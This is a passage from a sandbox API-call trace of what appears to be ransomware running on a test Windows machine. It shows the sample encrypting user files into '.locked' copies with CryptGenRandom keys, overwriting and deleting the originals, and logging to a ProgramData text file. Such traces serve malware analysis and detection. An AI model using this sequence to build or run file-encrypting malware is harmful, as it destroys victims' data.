[0307.334] SetEvent (hEvent=0x21c) returned 1 [0307.334] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0307.360] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0307.365] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0307.365] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x125d9e94 | out: lpMode=0x125d9e94) returned 0 [0307.365] WriteFile (in: hFile=0x1bc, lpBuffer=0x1264a100*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x125d9e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a100*, lpNumberOfBytesWritten=0x125d9e64*=0x31, lpOverlapped=0x0) returned 1 [0307.366] CloseHandle (hObject=0x1bc) returned 1 [0307.367] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\ncy0WD.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ncy0wd.pptx")) returned 1 [0307.423] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\ncy0WD.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ncy0wd.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0307.679] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0307.717] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125d9e88 | out: lpMode=0x125d9e88) returned 0 [0307.717] WriteFile (in: hFile=0x1c0, lpBuffer=0x134a8000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125d9e78, lpOverlapped=0x0 | out: lpBuffer=0x134a8000*, lpNumberOfBytesWritten=0x125d9e78*=0xfa000, lpOverlapped=0x0) returned 1 [0307.754] CloseHandle (hObject=0x1c0) returned 1 [0307.843] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0307.887] SetEvent (hEvent=0x220) returned 1 [0307.887] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0307.890] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0307.964] SetEvent (hEvent=0x20c) returned 1 [0307.964] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0308.159] SetEvent (hEvent=0x104) returned 1 [0308.160] SetEvent (hEvent=0x214) returned 1 [0308.160] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0308.178] SetEvent (hEvent=0x104) returned 1 [0308.178] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0308.184] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x1239da24*=0xc) returned 1 [0308.237] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\OLa7wRx3.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\ola7wrx3.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0308.237] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0308.237] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\OLa7wRx3.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\ola7wrx3.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0308.356] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0308.473] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0308.473] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0308.473] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392010 | out: pbBuffer=0x12392010) returned 1 [0308.473] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0308.474] WriteFile (in: hFile=0x1f4, lpBuffer=0x1263b000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x1263b000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0308.480] ReadFile (in: hFile=0x228, lpBuffer=0x151dc000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x151dc000*, lpNumberOfBytesRead=0x1239dd68*=0x5733, lpOverlapped=0x0) returned 1 [0308.483] WriteFile (in: hFile=0x1f4, lpBuffer=0x151dc000*, nNumberOfBytesToWrite=0x5733, lpNumberOfBytesWritten=0x1239dd74, lpOverlapped=0x0 | out: lpBuffer=0x151dc000*, lpNumberOfBytesWritten=0x1239dd74*=0x5733, lpOverlapped=0x0) returned 1 [0308.499] ReadFile (in: hFile=0x228, lpBuffer=0x151dc000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x151dc000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0308.499] CloseHandle (hObject=0x1f4) returned 1 [0308.501] CloseHandle (hObject=0x228) returned 1 [0308.502] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0308.502] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x1239de94 | out: lpMode=0x1239de94) returned 0 [0308.502] WriteFile (in: hFile=0x228, lpBuffer=0x125ee120*, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x1239de64, lpOverlapped=0x0 | out: lpBuffer=0x125ee120*, lpNumberOfBytesWritten=0x1239de64*=0x5a, lpOverlapped=0x0) returned 1 [0308.502] CloseHandle (hObject=0x228) returned 1 [0308.503] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\OLa7wRx3.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\ola7wrx3.mp3")) returned 1 [0308.517] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb30, ulCount=0x10, ulNumEntriesRemoved=0x3254fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb30, ulNumEntriesRemoved=0x3254fb10) returned 0 [0308.517] SetEvent (hEvent=0x134) returned 1 [0308.517] SetEvent (hEvent=0x198) returned 1 [0308.517] SetEvent (hEvent=0x220) returned 1 [0308.543] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\OLa7wRx3.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\ola7wrx3.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0308.565] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x124a1e88 | out: lpMode=0x124a1e88) returned 0 [0308.565] WriteFile (in: hFile=0x218, lpBuffer=0x13356000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a1e78, lpOverlapped=0x0 | out: lpBuffer=0x13356000*, lpNumberOfBytesWritten=0x124a1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0308.586] CloseHandle (hObject=0x218) returned 1 [0308.610] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\OLa7wRx3.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\ola7wrx3.mp3")) returned 1 [0308.729] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x125fc020*, lpNumberOfCharsWritten=0x1239da24*=0xc) returned 1 [0308.737] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Cg4wICSJ7X32.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\cg4wicsj7x32.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0308.738] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0308.738] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Cg4wICSJ7X32.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\cg4wicsj7x32.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0309.385] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0309.413] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0309.413] SetEvent (hEvent=0x20c) returned 1 [0309.413] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.113] SetEvent (hEvent=0x14c) returned 1 [0310.113] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.440] SetEvent (hEvent=0x104) returned 1 [0310.440] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.453] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb30, ulCount=0x10, ulNumEntriesRemoved=0x3254fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb30, ulNumEntriesRemoved=0x3254fb10) returned 0 [0310.453] SetEvent (hEvent=0x1f0) returned 1 [0310.453] SetEvent (hEvent=0x21c) returned 1 [0310.453] SetEvent (hEvent=0x1d0) returned 1 [0310.509] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\shxQYJ mAX35K2VsG.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\shxqyj max35k2vsg.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0310.564] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.629] SetEvent (hEvent=0x150) returned 1 [0310.629] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1249fe88 | out: lpMode=0x1249fe88) returned 0 [0310.629] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.673] WriteFile (in: hFile=0x1bc, lpBuffer=0x14fe0000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249fe78, lpOverlapped=0x0 | out: lpBuffer=0x14fe0000*, lpNumberOfBytesWritten=0x1249fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0310.692] CloseHandle (hObject=0x1bc) returned 1 [0310.693] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\shxQYJ mAX35K2VsG.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\shxqyj max35k2vsg.xlsx")) returned 1 [0310.710] SetEvent (hEvent=0x1b8) returned 1 [0310.710] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.739] SetEvent (hEvent=0x1b8) returned 1 [0310.739] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.766] SetEvent (hEvent=0x1e8) returned 1 [0310.766] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.770] SetEvent (hEvent=0x1b8) returned 1 [0310.770] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.778] SetEvent (hEvent=0x1f0) returned 1 [0310.778] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.780] SetEvent (hEvent=0x1e8) returned 1 [0310.780] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.795] SetEvent (hEvent=0x1e8) returned 1 [0310.795] WriteFile (in: hFile=0x224, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dee78, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x125dee78*=0xfa000, lpOverlapped=0x0) returned 1 [0310.831] CloseHandle (hObject=0x224) returned 1 [0310.833] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\IcIyvO_b9I-.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\iciyvo_b9i-.wav")) returned 1 [0310.854] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.942] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.945] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0310.946] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0310.946] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766080 | out: pbBuffer=0x12766080) returned 1 [0310.946] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0310.947] WriteFile (in: hFile=0x230, lpBuffer=0x123da000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x123da000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0310.950] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x0 [0310.952] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb30, ulCount=0x10, ulNumEntriesRemoved=0x3254fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb30, ulNumEntriesRemoved=0x3254fb10) returned 0 [0310.952] SetEvent (hEvent=0x150) returned 1 [0310.952] SetEvent (hEvent=0x1ac) returned 1 [0310.952] SetEvent (hEvent=0x14c) returned 1 [0310.952] SetEvent (hEvent=0x1f0) returned 1 [0310.952] ReadFile (in: hFile=0x1c8, lpBuffer=0x144fa000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x144fa000*, lpNumberOfBytesRead=0x123a3d68*=0xf9f0, lpOverlapped=0x0) returned 1 [0310.955] WriteFile (in: hFile=0x230, lpBuffer=0x144fa000*, nNumberOfBytesToWrite=0xf9f0, lpNumberOfBytesWritten=0x123a3d74, lpOverlapped=0x0 | out: lpBuffer=0x144fa000*, lpNumberOfBytesWritten=0x123a3d74*=0xf9f0, lpOverlapped=0x0) returned 1 [0310.961] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0311.466] ReadFile (in: hFile=0x1c8, lpBuffer=0x144fa000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x144fa000*, lpNumberOfBytesRead=0x123a3d68*=0x0, lpOverlapped=0x0) returned 1 [0311.469] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0311.572] CloseHandle (hObject=0x230) returned 1 [0311.573] CloseHandle (hObject=0x1c8) returned 1 [0311.573] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0311.573] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x123a3e94 | out: lpMode=0x123a3e94) returned 0 [0311.573] WriteFile (in: hFile=0x1c8, lpBuffer=0x123501c0*, nNumberOfBytesToWrite=0x64, lpNumberOfBytesWritten=0x123a3e64, lpOverlapped=0x0 | out: lpBuffer=0x123501c0*, lpNumberOfBytesWritten=0x123a3e64*=0x64, lpOverlapped=0x0) returned 1 [0311.574] CloseHandle (hObject=0x1c8) returned 1 [0311.574] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\6PknB4UT.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\6pknb4ut.wav")) returned 1 [0311.683] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0311.909] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\6PknB4UT.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\6pknb4ut.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0312.497] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0312.548] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x123a3e88 | out: lpMode=0x123a3e88) returned 0 [0312.548] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0312.625] SetEvent (hEvent=0x1f0) returned 1 [0312.625] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0312.657] SetEvent (hEvent=0x1b8) returned 1 [0312.657] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0312.840] SetEvent (hEvent=0x22c) returned 1 [0312.840] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0312.851] SetEvent (hEvent=0x14c) returned 1 [0312.851] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0313.177] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x123a1a24*=0xc) returned 1 [0313.181] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0313.446] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\1MwQ46yFzkmbDV8forC.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\1mwq46yfzkmbdv8forc.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0313.447] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0313.447] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\1MwQ46yFzkmbDV8forC.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\1mwq46yfzkmbdv8forc.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0313.505] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0313.657] SetEvent (hEvent=0x150) returned 1 [0313.657] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0313.657] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0313.700] SwitchToThread () returned 1 [0313.700] SetEvent (hEvent=0x184) returned 1 [0313.700] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0313.701] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0313.823] SwitchToThread () returned 1 [0313.825] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0313.826] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0313.850] SetEvent (hEvent=0x214) returned 1 [0313.850] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0313.857] WriteFile (in: hFile=0x1c0, lpBuffer=0x12bce000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dfe78, lpOverlapped=0x0 | out: lpBuffer=0x12bce000*, lpNumberOfBytesWritten=0x125dfe78*=0xfa000, lpOverlapped=0x0) returned 1 [0313.887] CloseHandle (hObject=0x1c0) returned 1 [0313.888] WriteFile (in: hFile=0x200, lpBuffer=0x144f8000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249fe78, lpOverlapped=0x0 | out: lpBuffer=0x144f8000*, lpNumberOfBytesWritten=0x1249fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0313.920] CloseHandle (hObject=0x200) returned 1 [0313.927] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\LY6q.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\ly6q.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0313.927] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x125ddd9c | out: lpMode=0x125ddd9c) returned 0 [0313.927] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e7a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x125e7a24*=0xc) returned 1 [0313.933] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0313.959] SetEvent (hEvent=0x214) returned 1 [0313.959] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0313.959] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.004] SetEvent (hEvent=0x1e8) returned 1 [0314.004] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.032] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\LY6q.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\ly6q.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0314.033] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125ddd9c | out: lpMode=0x125ddd9c) returned 0 [0314.033] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0314.033] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766030 | out: pbBuffer=0x12766030) returned 1 [0314.033] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0314.033] WriteFile (in: hFile=0x19c, lpBuffer=0x1267d000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265bd78, lpOverlapped=0x0 | out: lpBuffer=0x1267d000*, lpNumberOfBytesWritten=0x1265bd78*=0x80, lpOverlapped=0x0) returned 1 [0314.036] ReadFile (in: hFile=0x200, lpBuffer=0x13b34000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x13b34000*, lpNumberOfBytesRead=0x1265bd68*=0x72c7, lpOverlapped=0x0) returned 1 [0314.037] WriteFile (in: hFile=0x19c, lpBuffer=0x13b34000*, nNumberOfBytesToWrite=0x72c7, lpNumberOfBytesWritten=0x1265bd74, lpOverlapped=0x0 | out: lpBuffer=0x13b34000*, lpNumberOfBytesWritten=0x1265bd74*=0x72c7, lpOverlapped=0x0) returned 1 [0314.042] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.111] SetEvent (hEvent=0x150) returned 1 [0314.111] SetEvent (hEvent=0x22c) returned 1 [0314.111] ReadFile (in: hFile=0x200, lpBuffer=0x13b34000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x13b34000*, lpNumberOfBytesRead=0x1265bd68*=0x0, lpOverlapped=0x0) returned 1 [0314.111] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.154] SetEvent (hEvent=0x150) returned 1 [0314.154] SetEvent (hEvent=0x214) returned 1 [0314.154] CloseHandle (hObject=0x19c) returned 1 [0314.154] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0314.251] CloseHandle (hObject=0x200) returned 1 [0314.252] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0314.252] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1265be94 | out: lpMode=0x1265be94) returned 0 [0314.252] WriteFile (in: hFile=0x200, lpBuffer=0x125740f0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x1265be64, lpOverlapped=0x0 | out: lpBuffer=0x125740f0*, lpNumberOfBytesWritten=0x1265be64*=0x4b, lpOverlapped=0x0) returned 1 [0314.252] CloseHandle (hObject=0x200) returned 1 [0314.252] DeleteFileW 